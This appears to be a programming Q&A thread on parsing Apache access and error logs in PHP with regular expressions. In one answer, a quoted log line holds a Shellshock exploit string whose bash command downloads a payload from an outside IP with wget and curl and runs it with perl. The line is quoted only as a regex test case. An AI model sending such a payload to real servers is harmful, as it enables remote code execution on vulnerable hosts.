Parse Apache log in PHP using preg_match

日久生厌 2020-12-23 14:34

I need to save data in a table (for reporting, stats etc...) so a user can search by time, user agent etc. I have a script that runs every day that reads the Apache Log and

5 Answers
  • 2020-12-23 14:51

    Having seen (and written) a lot of erroneous log parsing, here is a hopefully valid regex, tested on 50k log lines without a single diff, given that:

    • auth_user can have spaces
    • response_size can be -
    • http_start_line contains at least one space (HTTP/0.9) or two
    • http_start_line may contain double quotes
    • referrer can be empty, have spaces, or double quotes (it's just an HTTP header)
    • user_agent can be empty too, or contain double quotes, and spaces
    • It's hard to distinguish between referrer and user agent. Let's just hope the " " between the two is discriminating enough; yet the infamous " " can also appear inside the referrer and inside the user agent, so basically we're screwed here.

      $ncsa_re = '/^(?P<IP>\S+)
      \ (?P<ident>\S+)
      \ (?P<auth_user>.*?) # Spaces are allowed here, can be empty.
      \ (?P<date>\[[^]]+\])
      \ "(?P<http_start_line>.+\ .+)" # At least one space: HTTP 0.9
      \ (?P<status_code>[0-9]+) # Status code is _always_ an integer
      \ (?P<response_size>(?:[0-9]+|-)) # Response size can be -
      \ "(?P<referrer>.*)" # Referrer can contain anything: it is just a header
      \ "(?P<user_agent>.*)"$/x';
      

    Hope that helps.
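
    As a rough usage sketch of the pattern above (with ident as \S+ and the space in the request line escaped, since the x modifier ignores unescaped whitespace), the named groups can be turned into a row ready for a database insert. The sample line and the array keys are made up for illustration; they are not from the original question.

    ```php
    <?php
    // Same pattern as above, without the inline comments.
    $ncsa_re = '/^(?P<IP>\S+)
    \ (?P<ident>\S+)
    \ (?P<auth_user>.*?)
    \ (?P<date>\[[^]]+\])
    \ "(?P<http_start_line>.+\ .+)"
    \ (?P<status_code>[0-9]+)
    \ (?P<response_size>(?:[0-9]+|-))
    \ "(?P<referrer>.*)"
    \ "(?P<user_agent>.*)"$/x';

    // Hypothetical sample line in combined log format.
    $line = '192.0.2.10 - john doe [23/Dec/2020:14:34:00 +0000] '
          . '"GET /index.php HTTP/1.1" 200 1234 '
          . '"http://example.com/" "Mozilla/5.0 (X11; Linux x86_64)"';

    $row = null;
    if (preg_match($ncsa_re, $line, $m)) {
        // Strip the surrounding brackets, then parse the Apache timestamp.
        $when = DateTime::createFromFormat('d/M/Y:H:i:s O', trim($m['date'], '[]'));
        $row = [
            'ip'         => $m['IP'],
            'user'       => $m['auth_user'],
            'time'       => $when->format('Y-m-d H:i:s'),
            'request'    => $m['http_start_line'],
            'status'     => (int) $m['status_code'],
            // A size of "-" means no body was sent; store it as 0 here.
            'bytes'      => $m['response_size'] === '-' ? 0 : (int) $m['response_size'],
            'referrer'   => $m['referrer'],
            'user_agent' => $m['user_agent'],
        ];
    }
    ```

    Storing the timestamp in a sortable format such as Y-m-d H:i:s makes the later "search by time" queries straightforward.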

  • 2020-12-23 14:55

    Your regexp is wrong. Use this one instead:

    /^(\S+) (\S+) (\S+) - \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) "([^"]*)" "([^"]*)"$/
    
  • 2020-12-23 14:56

    To parse an Apache access_log log in PHP you can use this regex:

    $regex = '/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) "([^"]*)" "([^"]*)"$/';
    preg_match($regex, $log, $matches);
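
    The access_log regex has thirteen capture groups, so it can help to label them. This is only a sketch: the field names and the sample line are illustrative assumptions, not part of the original answer.

    ```php
    <?php
    $regex = '/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) "([^"]*)" "([^"]*)"$/';

    // Illustrative labels for capture groups 1..13, in order.
    $fields = ['ip', 'ident', 'user', 'date', 'time', 'tz', 'method', 'path',
               'protocol', 'status', 'bytes', 'referrer', 'user_agent'];

    // Hypothetical sample line in combined log format.
    $log = '127.0.0.1 - - [23/Dec/2020:14:34:00 +0000] "GET /index.php?x=1 HTTP/1.1" 200 512 "-" "curl/7.68.0"';

    $entry = null;
    if (preg_match($regex, $log, $matches)) {
        array_shift($matches);                      // drop the full-match element
        $entry = array_combine($fields, $matches);  // name => captured value
    }
    ```

    All captured values are strings, so cast status and bytes before storing them in numeric columns.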
    

    To match the Apache error_log format, you can use this regex:

    $regex = '/^\[([^\]]+)\] \[([^\]]+)\] (?:\[client ([^\]]+)\])?\s*(.*)$/i';
    preg_match($regex, $log, $matches);
    // $matches[1] = date and time,            $matches[2] = severity,
    // $matches[3] = client addr (if present), $matches[4] = log message
    

    It matches lines with or without the client:

    [Tue Feb 28 11:42:31 2012] [notice] Apache/2.4.1 (Unix) mod_ssl/2.4.1 OpenSSL/0.9.8k PHP/5.3.10 configured -- resuming normal operations
    [Tue Feb 28 14:34:41 2012] [error] [client 192.168.50.10] Symbolic link not allowed or link target not accessible: /usr/local/apache2/htdocs/x.js
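
    To check this, the two sample lines above can be run through the error_log regex. In this sketch the array keys are illustrative; note that preg_match leaves $matches[3] as an empty string when the optional client group does not take part in the match.

    ```php
    <?php
    $regex = '/^\[([^\]]+)\] \[([^\]]+)\] (?:\[client ([^\]]+)\])?\s*(.*)$/i';

    $lines = [
        '[Tue Feb 28 11:42:31 2012] [notice] Apache/2.4.1 (Unix) mod_ssl/2.4.1 OpenSSL/0.9.8k PHP/5.3.10 configured -- resuming normal operations',
        '[Tue Feb 28 14:34:41 2012] [error] [client 192.168.50.10] Symbolic link not allowed or link target not accessible: /usr/local/apache2/htdocs/x.js',
    ];

    $parsed = [];
    foreach ($lines as $log) {
        if (preg_match($regex, $log, $matches)) {
            $parsed[] = [
                'time'     => $matches[1],
                'severity' => $matches[2],
                // Empty string means the line had no [client ...] part.
                'client'   => $matches[3] !== '' ? $matches[3] : null,
                'message'  => $matches[4],
            ];
        }
    }
    ```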
    
  • 2020-12-23 15:04

    I tried a couple of the regexps here in January 2015 and found that a line from a bad bot did not match in my apache2 log.

    The line is a Bash exploit attempt (the Shellshock pattern). Its user agent contains backslash-escaped double quotes (\"), which "([^"]*)" cannot match; I haven't worked out the regexp correction yet:

    199.217.117.211 - - [18/Jan/2015:10:52:27 -0500] "GET /cgi-bin/help.cgi HTTP/1.0" 404 498 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://185.28.190.69/mc;curl -O http://185.28.190.69/mc;perl mc;perl /tmp/mc\""
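
    One possible correction, offered as a sketch rather than a tested fix for every log: let the quoted fields accept either a character that is neither a quote nor a backslash, or a backslash followed by any character. This assumes embedded quotes are always backslash-escaped, as they are in the line above. The variable names are made up for illustration.

    ```php
    <?php
    // Quoted field that tolerates backslash-escaped characters such as \".
    // In a single-quoted PHP string, \\\\ reaches PCRE as \\ (one literal backslash).
    $quoted = '"((?:[^"\\\\]|\\\\.)*)"';

    $regex = '/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] '
           . '"(\S+) (.*?) (\S+)" (\S+) (\S+) ' . $quoted . ' ' . $quoted . '$/';

    // The stricter pattern from the earlier answer, for comparison.
    $strict = '/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) "([^"]*)" "([^"]*)"$/';

    $line = '199.217.117.211 - - [18/Jan/2015:10:52:27 -0500] "GET /cgi-bin/help.cgi HTTP/1.0" 404 498 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://185.28.190.69/mc;curl -O http://185.28.190.69/mc;perl mc;perl /tmp/mc\""';

    $strict_hit  = preg_match($strict, $line);      // 0: the escaped quotes break it
    $relaxed_hit = preg_match($regex, $line, $m);   // 1: the escapes are accepted
    $user_agent  = $relaxed_hit ? $m[13] : null;    // still contains the backslashes
    ```

    The captured user agent keeps its backslashes; stripslashes() can remove them if the raw value is needed.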
    
  • 2020-12-23 15:07

    If you don't want to capture the double quotes, move them out of the capture groups.

     (\".*?\") 
    

    Should become:

     \"(.*?)\"
    

    As an alternative, you could just post-process the entries with trim($str, '"').
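
    A small sketch of both options side by side; the sample value is hypothetical:

    ```php
    <?php
    $field = '"Mozilla/5.0 (compatible)"';

    // Option 1: quotes sit outside the capture group.
    preg_match('/"(.*?)"/', $field, $m1);
    $inner = $m1[1];

    // Option 2: capture including the quotes, then strip them afterwards.
    preg_match('/(".*?")/', $field, $m2);
    $trimmed = trim($m2[1], '"');
    ```

    Both give the same result here. Keep in mind that trim() removes every leading and trailing double quote, so a value that itself starts or ends with a quote character would lose it too.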
